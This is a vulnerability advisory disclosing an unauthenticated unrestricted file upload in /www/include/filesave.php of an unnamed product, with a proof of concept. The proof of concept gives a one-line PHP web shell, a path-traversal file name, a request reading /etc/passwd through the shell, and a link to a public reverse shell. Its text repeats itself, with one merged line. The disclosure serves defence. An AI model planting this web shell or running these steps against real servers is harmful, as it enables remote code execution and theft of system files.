Unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server.
Details
/www/include/filesave.php allows for any file to uploaded to anywhere. If an attacker uploads a php file they can execute code on the server. https://cwe.mitre.org/data/definitions/434.html
PoC
Using default configuration, intercept the POST request used to save the settings in Burp Suite.
Rename the file to ../shell.php
Replace the data to the following:
<?php
echo "Beaux was here ";
system($_REQUEST['cmd']);
?>
Summary
Unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server.
Details
/www/include/filesave.php allows for any file to uploaded to anywhere. If an attacker uploads a php file they can execute code on the server.
https://cwe.mitre.org/data/definitions/434.html
PoC
Using default configuration, intercept the POST request used to save the settings in Burp Suite.
Rename the file to
../shell.phpReplace the data to the following:
in a browser go to
http://x.x.x.x/shell.php?cmd=cat%20/etc/passwd
Here is a video demo:
https://youtu.be/FEXuw5GJW-Y
A full reverse shell would also work:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Impact
Remote code execution allows an unauthenticated attacker to run arbitrary code on the server.